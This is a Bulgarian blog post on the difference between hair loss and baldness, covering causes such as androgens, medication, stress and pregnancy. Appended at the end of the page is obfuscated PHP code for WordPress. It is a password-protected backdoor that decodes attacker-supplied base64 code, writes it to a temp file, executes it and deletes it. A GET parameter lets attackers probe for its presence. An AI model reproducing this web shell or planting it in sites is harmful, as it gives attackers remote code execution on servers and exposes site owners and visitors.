Каква е разликата между косопад и оплешивяване | Косопад

Има ли разлика между оплешивяване и косопад?

Малцина правят разлика между понятията косопад и оплешивяване, въпреки че в медицината те са два абсолютно различни термина. Причина за това е тънката граница между тях и фактът, че крайният ефект (или по – скоро дефект) е един и същ.

Докторът на медицинските науки Моника Уестууд от Университета във Вирджиния, САЩ разкрива, че в действителност тоталното оплешивяване е една от тежките форми на косопад, унаследява се по генетичен път или е породено от събитията в живота на отделния индивид.

Косопад и оплешивяване могат да бъдат предизвикани по много причини, които трябва да бъдат щателно изследвани, за да се установи правилният метод на лечение. Това са лошата хигиена на косата, неправилното третиране и поддържане, заболяване, употреба на различни лекарствени средства, преумора и стрес, често боядисване, изтощителна бременност и така нататък.

Оплешивяване и косопад

Никой не е застрахован от оплешивяване и косопад

В доста от случаите, оплешивяване се причинява от същите фактори предизвикващи косопад, но това не винаги е така. Д-р Уестууд допълва, че в световен мащаб най – честата причина за опадане на косата е високата чувствителност на скалпа към андрогените (мъжките полови хормони), следвана от антиреакция при употреба на лекарства и заболявания на имунната система. В последния случай обичайно се наблюдават признаци на обща преумора и повишен стрес.

Лечението на косопад и оплешивяване е най – трудно, когато се дължи на генетична обремененост, въпреки че не е невъзможно. Ако е предизвикано от лекарства, неправилен начин на живот, напрежение в ежедневието или бременност, има огромна надежда проблемът да се тушира напълно, особено ако се забележи в начален стадий.

Оплешивяване и косопад

Има ли разлика между оплешивяване и косопад

04. април 2013 21:18:10 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}